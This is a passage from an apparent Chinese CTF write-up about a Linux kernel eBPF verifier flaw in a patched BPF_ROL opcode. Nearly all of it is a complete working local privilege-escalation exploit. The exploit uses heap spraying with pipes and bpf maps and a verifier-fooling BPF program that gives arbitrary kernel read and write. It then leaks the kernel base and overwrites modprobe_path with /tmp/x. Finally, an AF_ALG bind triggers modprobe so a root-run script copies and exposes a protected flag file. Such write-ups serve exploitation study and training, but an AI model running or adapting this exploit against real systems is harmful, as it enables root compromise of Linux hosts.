return 1;
}

/* nonexistent algorithm type so alg_get_type() returns -ENOENT */
memset(&sa, 0, sizeof(sa));
sa.salg_family = AF_ALG;
strcpy((char *)sa.salg_type, "Qanux"); // dummy string
bind(alg_fd, (struct sockaddr *)&sa, sizeof(sa));
return 1;
}

exp

最终 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
// musl-gcc exp.c --static -masm=intel -lpthread -idirafter /usr/include/ -idirafter /usr/include/x86_64-linux-gnu/ -o exp

#define _GNU_SOURCE

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <linux/keyctl.h>
#include <sys/user.h>
#include <sys/ptrace.h>
#include <stddef.h>
#include <sys/utsname.h>
#include <stdbool.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <linux/userfaultfd.h>
#include <sys/socket.h>
#include <asm/ldt.h>
#include <linux/if_packet.h>
#include <linux/bpf.h>
#include <bpf/libbpf.h>
#include <linux/bpf_common.h>
#include <linux/if_alg.h>
#include "bpf_insn.h"

int sockets[2];
int map_fd1;
int map_fd2;
int prog_fd;
uint32_t key;
uint64_t* value1;
uint64_t* value2;
char trigger_buf[0x2000];
int64_t buf[0x2000/8] = { 0 };

#define BPF_VICTIM_READ_BY_ADDRESS 0xbeef
#define BPF_VICTIM_WRITE_BY_ADDRESS 0xdeaf
#define BPF_VICTIM_READ_BY_2BYTES 0xdead

#define MAX_PIPE_COUNT 0x20
int pipe_fd[MAX_PIPE_COUNT][2];

/*
 * Create pipe pairs pipe_fd[start] .. pipe_fd[cnt-1] (`cnt` is an
 * exclusive end index, not a count relative to `start`).
 * Exits the process if any pipe() call fails.
 *
 * Fix: removed the unused `char *buf[0x1000]` local, which reserved
 * 32 KiB of stack for nothing.
 */
void spray_pipes(int start, int cnt) {
    printf("[*] enter %s start from index: %d\n", __PRETTY_FUNCTION__, start);

    for (int i = start; i < cnt; ++i) {
        if (pipe(pipe_fd[i]) < 0) {
            perror("create pipe");
            exit(0);
        }
    }
}

/* Enlarge every sprayed pipe's ring to 128 pages via F_SETPIPE_SZ so the
 * kernel reallocates each pipe_buffer array from a larger allocation —
 * presumably to land them at the slab order targeted next to the sprayed
 * bpf_array (see the page-feng-shui discussion above).  Exits on failure. */
void pipes_resize(){
puts("[*] pipe buffer resize");
for(int i = 0; i < MAX_PIPE_COUNT; i++){
if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 128) < 0) {
perror("resize pipe");
exit(0);
}
}
}

/*
 * Write a few bytes into every sprayed pipe so each allocates its backing
 * page and populates its first pipe_buffer entry; the trailing index `k`
 * identifies which pipe was hit once the map value pointer is corrupted.
 *
 * Fix: the original did write(fd, "Qanux", 8), reading 2 bytes past the
 * 6-byte string literal (out-of-bounds read, garbage bytes in the pipe).
 * Use an 8-byte zero-padded buffer; the first 6 bytes written are identical.
 */
void pipe_buffer_init(){
    static const char tag[8] = "Qanux";   /* "Qanux\0\0\0" — exactly 8 bytes */

    puts("[*] pipe buffer init");
    for (int i = 0; i < MAX_PIPE_COUNT; ++i) {
        uint32_t k = i;
        write(pipe_fd[i][1], "writesth", 8);
        write(pipe_fd[i][1], tag, 8);
        write(pipe_fd[i][1], &k, sizeof(uint32_t));
    }
}

/* Print a red error tag, linger 5 s (keeps the message visible before the
 * environment tears down), then terminate the process. */
void err_exit(char *msg){
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}

/* Print an informational message in bold blue. */
void info(char *msg){
printf("\033[34m\033[1m[+] %s\n\033[0m", msg);
}

/* Print a labeled value in hex, in bold green. */
void hexx(char *msg, size_t value){
printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}

/* Hex-dump `len` bytes at `addr`: offset column, then four 64-bit words per
 * row, then a printable-ASCII rendering of the row's 32 bytes.
 * `desc` is an optional heading (may be NULL).  Only full 8-byte words are
 * shown (len is effectively rounded down to a multiple of 8). */
void binary_dump(char *desc, void *addr, int len) {
uint64_t *buf64 = (uint64_t *) addr;
uint8_t *buf8 = (uint8_t *) addr;
if (desc != NULL) {
printf("\033[33m[*] %s:\n\033[0m", desc);
}
for (int i = 0; i < len / 8; i += 4) {
printf(" %04x", i * 8);
for (int j = 0; j < 4; j++) {
/* pad with a blank cell when the final row has fewer than 4 words */
i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 32 && j + i * 8 < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}

/* bind the process to specific core */
void bind_core(int core){
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

size_t user_cs, user_ss, user_rflags, user_sp;
/* Snapshot userland cs/ss/rsp/rflags into the globals above so a later
 * kernel-to-user transition can restore the original execution state.
 * Intel-syntax inline asm — requires the -masm=intel flag from the build
 * command at the top of the file. */
void save_status(){
asm volatile (
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

/*
 * Trigger a modprobe_path invocation from userspace.
 *
 * Binding an AF_ALG socket with an unknown algorithm type makes alg_bind()
 * fail alg_get_type() with -ENOENT and call request_module("algif-%s", ...),
 * which ends in call_modprobe() executing the (overwritten) modprobe_path
 * (see the quoted alg_bind() kernel code above).
 *
 * Fixes: the socket fd is now closed (the original leaked it) and the
 * bind() result is reported.  bind() is expected to fail here — the
 * kernel-side module-load attempt is the desired side effect.  The return
 * value stays 1 on all paths for compatibility with existing callers.
 */
int trigger_modprobe(){
    struct sockaddr_alg sa;

    int alg_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
    if (alg_fd < 0) {
        perror("socket(AF_ALG) failed");
        return 1;
    }

    memset(&sa, 0, sizeof(sa));
    sa.salg_family = AF_ALG;
    strcpy((char *)sa.salg_type, "Qanux"); // dummy string, no such algif module
    if (bind(alg_fd, (struct sockaddr *)&sa, sizeof(sa)) < 0)
        perror("bind(AF_ALG)"); /* expected; request_module() already ran */

    close(alg_fd);
    return 1;
}

/*
 * After modprobe_path has been overwritten with "/tmp/x": drop a fake
 * modprobe script that copies the flag somewhere world-readable, fire it
 * via the AF_ALG request_module() path, then read and print the flag.
 *
 * Fixes: trigger_modprobe() takes no arguments (the original passed a
 * bogus 0); the flag fd is now closed; read() is bounded to leave room
 * for a NUL terminator and its return value is used, so printf("%s")
 * can no longer run past the buffer.
 */
void get_root_flag(void){
    char buf[0x30];
    memset(buf, 0, sizeof(buf));
    puts("[*] Returned to userland, setting up for fake modprobe");

    system("echo '#!/bin/sh\ncp /flag.txt /tmp/flag\nchmod 777 /tmp/flag\ncat /flag.txt' > /tmp/x");
    system("chmod +x /tmp/x");

    trigger_modprobe();

    int fd = open("/tmp/flag", O_RDONLY);
    if (fd < 0) {
        puts("[-] Lose...");
    } else {
        ssize_t n = read(fd, buf, sizeof(buf) - 1);
        if (n < 0)
            n = 0;
        buf[n] = '\0';
        printf("[+] flag: %s", buf);
        close(fd);
    }
}

/* Thin wrapper around the raw bpf(2) syscall. */
static inline int bpf(int cmd, union bpf_attr *attr){
return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

/* Create a bpf map with the given type and geometry via BPF_MAP_CREATE.
 * Returns the new map fd, or a negative value on failure. */
static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,
unsigned int value_size, unsigned int max_entries){
union bpf_attr attr = {
.map_type = map_type,
.key_size = key_size,
.value_size = value_size,
.max_entries = max_entries,
};
return bpf(BPF_MAP_CREATE, &attr);
}

/* Create a BPF_MAP_TYPE_ARRAY_OF_MAPS whose inner-map template is `fd`.
 * Returns the outer map fd on success, -1 on failure. */
int create_bpf_array_of_map(int fd, int key_size, int value_size, int max_entries) {
    union bpf_attr attr = {
        .map_type = BPF_MAP_TYPE_ARRAY_OF_MAPS,
        .key_size = key_size,
        .value_size = value_size,
        .max_entries = max_entries,
        .inner_map_fd = fd,
    };

    int outer_fd = syscall(SYS_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
    return outer_fd < 0 ? -1 : outer_fd;
}

/* Copy the value stored at `key` in map `map_fd` into `value`
 * (BPF_MAP_LOOKUP_ELEM).  Returns 0 on success, negative on failure. */
static __always_inline int
bpf_map_lookup_elem(int map_fd, const void* key, void* value){
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t)key,
.value = (uint64_t)value,
};
return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

/* Store `value` at `key` in map `map_fd` (BPF_MAP_UPDATE_ELEM).
 * `flags` is BPF_ANY / BPF_NOEXIST / BPF_EXIST.  Returns 0 on success. */
static __always_inline int
bpf_map_update_elem(int map_fd, const void* key, const void* value, uint64_t flags){
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t)key,
.value = (uint64_t)value,
.flags = flags,
};
return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}

/* Delete the entry at `key` from map `map_fd` (BPF_MAP_DELETE_ELEM).
 * Returns 0 on success, negative on failure. */
static __always_inline int
bpf_map_delete_elem(int map_fd, const void* key){
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t)key,
};
return bpf(BPF_MAP_DELETE_ELEM, &attr);
}

/* Fetch the key following `key` in map `map_fd` into `next_key`
 * (BPF_MAP_GET_NEXT_KEY).  Returns 0 on success, negative on failure. */
static __always_inline int
bpf_map_get_next_key(int map_fd, const void* key, void* next_key){
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t)key,
.next_key = (uint64_t)next_key,
};
return bpf(BPF_MAP_GET_NEXT_KEY, &attr);
}

/*
 * Return the btf_id of the map behind `map_fd` (BPF_OBJ_GET_INFO_BY_FD).
 *
 * Fix: `info` is now zero-initialized and the syscall result is checked —
 * the original returned an uninitialized stack value (undefined behavior)
 * whenever the bpf() call failed.  On failure this now returns 0.
 */
static __always_inline uint32_t
bpf_map_get_info_by_fd(int map_fd){
    struct bpf_map_info info = {0};
    union bpf_attr attr = {
        .info.bpf_fd = map_fd,
        .info.info_len = sizeof(info),
        .info.info = (uint64_t)&info,
    };
    if (bpf(BPF_OBJ_GET_INFO_BY_FD, &attr) < 0)
        return 0;
    return info.btf_id;
}

#define LOG_BUF_SIZE 65536
char bpf_log_buf[LOG_BUF_SIZE];
/*
 * Load a BPF program of `type` from `insns`/`insn_cnt`, capturing verifier
 * output into the global bpf_log_buf (log_level 1).
 * Returns the program fd, or -1 on failure (inspect bpf_log_buf).
 */
int bpf_prog_load6(enum bpf_prog_type type,
                   const struct bpf_insn *insns, int insn_cnt,
                   const char *license)
{
	union bpf_attr attr;

	memset(&attr, 0, sizeof(attr));
	attr.prog_type = type;
	attr.insns     = (size_t)(insns);
	attr.insn_cnt  = insn_cnt;
	attr.license   = (size_t)(license);
	attr.log_buf   = (size_t)(bpf_log_buf);
	attr.log_size  = LOG_BUF_SIZE;
	attr.log_level = 1;

	return syscall(SYS_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}
/*
 * Socket-filter program abusing the patched-in BPF_ROL opcode (0xe0 == 224,
 * see the kernel patch in the writeup header). The ROL result is mistracked
 * by the verifier, giving a register the verifier believes is 0 while its
 * runtime value is nonzero. That delta turns a bounded skb_load_bytes() into
 * a stack overflow of the saved map-value pointer at fp-8, yielding
 * read/write primitives selected by value2[0].
 * NOTE(review): map fds 83 and 84 are hard-coded — assumes the fd layout
 * produced by spray_bpf_map()/prep(); confirm before reuse.
 */
struct bpf_insn prog[] = {
BPF_MOV64_REG(BPF_REG_7, BPF_REG_1), // r7 = ctx (skb), saved for the later helper call
BPF_LD_MAP_FD(BPF_REG_1, 83), // r1 = map1 (hard-coded fd 83)
BPF_MOV64_IMM(BPF_REG_6, 0), // r6 = 0
BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_6, -8), // *(fp-8) = 0 (key = 0)
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), // r2 = fp
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), // r2 = fp-8 = &key
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // r0 = lookup(map1, &key)
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), // if r0 != NULL skip the exit
BPF_EXIT_INSN(), // lookup failed: bail out
BPF_MOV64_REG(BPF_REG_9, BPF_REG_0), // r9 = value1 ptr

BPF_LD_MAP_FD(BPF_REG_1, 84), // r1 = map2 (hard-coded fd 84)
BPF_MOV64_IMM(BPF_REG_5, 0), // r5 = 0
BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_5, -8), // *(fp-8) = 0 (key = 0)
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), // r2 = fp
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), // r2 = fp-8 = &key
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // r0 = lookup(map2, &key)
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), // if r0 != NULL skip the exit
BPF_EXIT_INSN(), // lookup failed: bail out
BPF_MOV64_REG(BPF_REG_8, BPF_REG_0), // r8 = value2 ptr (command block)

BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_9, -8), // *(fp-8) = value1 ptr (overflow target)

BPF_MOV32_IMM(BPF_REG_6, 0x2), // r6 = 2
BPF_ALU32_IMM(224, BPF_REG_6, 31), // 224 = BPF_ROL (patched opcode): rol32(r6, 31); verifier mistracks the result
BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 0x1), // runtime r6 = 1, verifier believes r6 = 0

BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_8, 0), // r5 = value2[0] = command selector
BPF_JMP_IMM(BPF_JNE, BPF_REG_5, 0xdead, 2), // 0xdead path: small delta (leak map addr)
BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 2), // runtime r6 = 2, verifier still 0
BPF_JMP_IMM(BPF_JEQ, BPF_REG_5, 0xdead, 1), // skip the bigger multiplier
BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 8), // non-0xdead path: runtime r6 = 8, verifier still 0

BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), // r1 = ctx
BPF_MOV64_IMM(BPF_REG_2, 0), // r2 = packet offset 0
BPF_MOV64_REG(BPF_REG_3, BPF_REG_10), // r3 = fp
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -16), // r3 = fp-16 (NOTE: original comment said fp-8; dest is fp-16)
BPF_MOV64_IMM(BPF_REG_4, 8), // r4 = 8 (verifier-visible length)
BPF_ALU64_REG(BPF_ADD, BPF_REG_4, BPF_REG_6), // runtime r4 = 8+r6 (10 or 16); verifier believes 8
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes), // copies past fp-8: packet bytes clobber the saved value1 ptr

BPF_LDX_MEM(BPF_DW, BPF_REG_9, BPF_REG_10, -8), // r9 = corrupted "value1 ptr" (attacker-partial/full address)

BPF_LDX_MEM(BPF_DW, BPF_REG_4, BPF_REG_8, 0), // re-read command selector
BPF_JMP_IMM(BPF_JEQ, BPF_REG_4, 0xdead, 4), // 0xdead: skip both (pure leak of the pointer path)
BPF_JMP_IMM(BPF_JEQ, BPF_REG_4, 0xbeef, 3), // 0xbeef: skip both
BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_8, 8), // r5 = value2[1] = data to write
BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_5, 0), // arbitrary WRITE: *r9 = data
BPF_JMP_IMM(BPF_JEQ, BPF_REG_4, 0xdeef, 2), // 0xdeef: write only, skip the read-back
BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_9, 0), // arbitrary READ: r5 = *r9
BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_5, 0), // value2[0] = leaked data (fetched via map lookup in userspace)

BPF_MOV64_IMM(BPF_REG_0, 0), // r0 = 0 (accept 0 bytes of the packet)
BPF_EXIT_INSN(), // exit()
};

/*
 * BPF_PROG_LOAD attributes for the exploit program above: socket filter,
 * GPL license, full verifier log (log_level 2) captured into bpf_log_buf
 * for debugging failed loads.
 */
union bpf_attr attr = {
.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
.insns = (uint64_t) &prog,
.insn_cnt = sizeof(prog) / sizeof(prog[0]),
.license = (uint64_t) "GPL",
.log_level = 2,
.log_buf = (uint64_t) bpf_log_buf,
.log_size = LOG_BUF_SIZE,
};

/*
 * One-time process setup: unbuffer stdio, pin to CPU 0, save userland
 * state for the eventual root shell, and pre-create /tmp/elf (presumably
 * the payload file referenced by the modprobe_path technique — confirm
 * against get_root_flag()).
 *
 * Fix: the error path used `return 1;` inside a void function, which is
 * invalid C; replaced with a plain `return;`.
 */
void init() {
	setbuf(stdin, NULL);
	setbuf(stdout, NULL);
	setbuf(stderr, NULL);

	bind_core(0);
	save_status();

	FILE *file;
	const char *filename = "/tmp/elf";

	file = fopen(filename, "w");
	if (file == NULL) {
		perror("Error opening file");
		return;	/* was `return 1;` — a void function cannot return a value */
	}
	fclose(file);
}

/*
 * Fire the attached socket filter: writing to sockets[0] makes the kernel
 * run the BPF program on the 0x100-byte packet (trigger_buf carries the
 * overflow bytes at offset 8). write() return value is ignored (best-effort).
 */
void trigger() {
write(sockets[0], trigger_buf, 0x100);
}

#define VALUE_SIZE 0x1000
int spray_bpf_fd[0x10];
/*
 * Heap shaping: allocate 0x10 ARRAY maps of VALUE_SIZE-byte values so
 * bpf_array objects land adjacent to the sprayed pipe_buffer pages.
 * Aborts via err_exit() on any creation failure.
 *
 * Fix: removed a calloc(VALUE_SIZE, 1) buffer that was allocated and freed
 * without ever being used (dead allocation).
 */
void spray_bpf_map(){
	puts("[*] spray bpf map.");
	for(int i = 0; i < 0x10; i++){
		spray_bpf_fd[i] = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), VALUE_SIZE, 1);
		if (spray_bpf_fd[i] < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");
	}
}

/*
 * Build the two exploit maps, load the BPF filter, and attach it to one
 * end of a datagram socketpair. map_fd1/map_fd2 must come out as fds 83/84
 * because the program hard-codes those numbers in BPF_LD_MAP_FD —
 * the earlier pipe/map sprays consume the preceding fd slots
 * (NOTE(review): fragile; confirm the fd layout if spray counts change).
 */
void prep() {
puts("[*] prepare bpf map");
value1 = (uint64_t*)calloc(VALUE_SIZE, 1);
value2 = (uint64_t*)calloc(VALUE_SIZE, 1);
prctl(PR_SET_NAME, "Qanux");	/* cosmetic: rename the task for easier debugging */

map_fd1 = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), VALUE_SIZE, 1);
if (map_fd1 < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");
printf("[+] map fd1: %d \n", map_fd1); // expected to be 83 (hard-coded in prog[])
map_fd2 = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), VALUE_SIZE, 1);
if (map_fd2 < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");
printf("[+] map fd2: %d \n", map_fd2); // expected to be 84 (hard-coded in prog[])

prog_fd = bpf(BPF_PROG_LOAD, &attr);
if (prog_fd < 0) puts(bpf_log_buf), perror("BPF_PROG_LOAD"), err_exit("BPF_PROG_LOAD");

if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0)
perror("socketpair()"), err_exit("socketpair()");

/* Attach to sockets[1]; writes into sockets[0] then run the filter. */
if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0)
perror("socketpair SO_ATTACH_BPF"), err_exit("socketpair()");
}

/*
 * Arbitrary 8-byte kernel read.
 * Selects the BPF program's full-pointer-overwrite read path via value2[0]
 * (BPF_VICTIM_READ_BY_ADDRESS — project constant defined elsewhere), plants
 * the target address in the packet at offset 8 so skb_load_bytes overwrites
 * the saved value1 pointer with it, then reads the result back out of map2.
 * The -0x18 adjustment presumably compensates for a fixed offset the BPF
 * side adds (value layout inside bpf_array) — TODO confirm.
 */
size_t leak_data(size_t address){
value2[0] = BPF_VICTIM_READ_BY_ADDRESS;
value2[1] = 0;
bpf_map_update_elem(map_fd2, &key, value2, BPF_ANY);
*(uint64_t *)(trigger_buf + 8) = address - 0x18;
trigger();
memset(buf, 0, sizeof(buf));
bpf_map_lookup_elem(map_fd2, &key, buf);	// BPF program stored the leaked qword in value2[0]
return *(uint64_t*)buf;
}

/*
 * Relative 8-byte read via 2-byte partial pointer overwrite.
 * Only the low bytes of the saved value1 pointer are clobbered (the 0xdead
 * command path copies 10 packet bytes, 2 past the verifier-approved 8), so
 * `bytes` steers the pointer within the current page/slab neighborhood —
 * used to scan adjacent bpf_array / pipe_buffer objects without a full leak.
 * NOTE(review): only trigger_buf[9] is set here; trigger_buf[8] is set by
 * the caller before each call.
 */
size_t leak_data_by_2bytes(int bytes){
value2[0] = BPF_VICTIM_READ_BY_2BYTES;
bpf_map_update_elem(map_fd2, &key, value2, BPF_ANY);
trigger_buf[8+1] = bytes;	// high byte of the 2-byte overwrite
trigger();
memset(buf, 0, sizeof(buf));
bpf_map_lookup_elem(map_fd2, &key, buf);	// BPF program stored the leaked qword in value2[0]
return *(uint64_t*)buf;
}

/*
 * Arbitrary 8-byte kernel write: *address = data.
 * Same mechanism as leak_data() but with the BPF program's write path
 * selected via value2[0]; value2[1] carries the qword to store.
 * NOTE(review): name keeps the original "wirte" typo — callers (main)
 * reference it, so renaming would break the build.
 */
void data_wirte(size_t address, size_t data){
value2[0] = BPF_VICTIM_WRITE_BY_ADDRESS;
value2[1] = data;
bpf_map_update_elem(map_fd2, &key, value2, BPF_ANY);
*(uint64_t *)(trigger_buf + 8) = address;
trigger();
}

/*
 * Exploit flow:
 *   1. shape the heap (pipes + bpf maps interleaved),
 *   2. load/attach the verifier-fooling BPF program,
 *   3. scan neighboring objects with the 2-byte partial-overwrite read to
 *      find a pipe_buffer's ops pointer (kernel text leak),
 *   4. overwrite modprobe_path with "/tmp/x" via the arbitrary write,
 *   5. trigger modprobe to read the root-owned flag.
 * Hard-coded offsets (0x142c580, 0xf1c820) are kernel-build specific.
 */
int main(int argc, char** argv, char** env)
{
init();
spray_pipes(0, MAX_PIPE_COUNT);	/* fill pages with pipe_buffer arrays */
spray_bpf_map();	/* interleave bpf_array allocations next to them */
prep();
pipes_resize();

pipe_buffer_init();

memset(trigger_buf, 'A', sizeof(trigger_buf));
value2[0] = BPF_VICTIM_READ_BY_2BYTES;
bpf_map_update_elem(map_fd1, &key, value1, BPF_ANY);
bpf_map_update_elem(map_fd2, &key, value2, BPF_ANY);

size_t pipe_ops = -1;	/* SIZE_MAX sentinel; `== -1` below compares correctly after conversion */
int victim_index = 0;
puts("[*] leak kernel addrss");
/* Probe 8 neighboring 0x20-byte strides: a value with the top 32 bits all
 * set looks like a kernel text pointer => pipe_buffer ops; otherwise we
 * assume we hit a bpf_array. */
for (int i = 0; i < 0x8; i++) {
int is_map = 1;
trigger_buf[8] = '\x10';
bpf_map_lookup_elem(map_fd2, &key, buf);
uint64_t data = leak_data_by_2bytes(i*0x20);
if ((data & 0xffffffff00000000) == (0xffffffff00000000)){
is_map = 0;
if(pipe_ops == -1){
pipe_ops = data;	/* first kernel-text-looking qword = anon_pipe_buf_ops */
victim_index = i*0x10;
}
}

if(is_map){
printf("[+] page %d (bpf_array):\n", i);
} else if((data & 0xffffffff00000000) == (0xffffffff00000000)){	/* NOTE(review): redundant — always true when !is_map */
printf("[+] page %d (pipe_buffer):\n", i);
}

/* Dump the first 4 qwords of this stride for debugging. */
trigger_buf[8] = '\x00';
printf("0x00: %-016llx ; ", leak_data_by_2bytes(i*0x20));
trigger_buf[8] = '\x08';
printf("0x08: %-016llx ; ", leak_data_by_2bytes(i*0x20));
trigger_buf[8] = '\x10';
printf("0x10: %-016llx ; ", leak_data_by_2bytes(i*0x20));
trigger_buf[8] = '\x18';
printf("0x18: %-016llx\n", leak_data_by_2bytes(i*0x20));
}
if (pipe_ops == -1)
err_exit("FAILED to leak kernel address");

hexx("pipe buffer ops", pipe_ops);
printf("[+] pipe buffer ops idx: %d \n", victim_index);

size_t kernel_base = pipe_ops - 0x142c580;	/* ops symbol offset in this kernel build */
hexx("kernel base", kernel_base);
size_t modprobe = pipe_ops + 0xf1c820;	/* modprobe_path, relative to the ops symbol */
hexx("modprobe", modprobe);

data_wirte(modprobe, 0x782f706d742f);	/* "/tmp/x\0\0" little-endian */
puts("[*] write /tmp/x to modprobe");

get_root_flag();	/* triggers modprobe -> /tmp/x runs as root */

puts("[+] EXP END.");

return 0;
}

效果如下:

成功率接近百分百(至少笔者还没失败过)

参考

https://arttnba3.cn/2023/05/31/EBPF_0X00/
https://blog.csdn.net/qq_61670993/article/details/136558244
https://theori.io/blog/reviving-the-modprobe-path-technique-overcoming-search-binary-handler-patch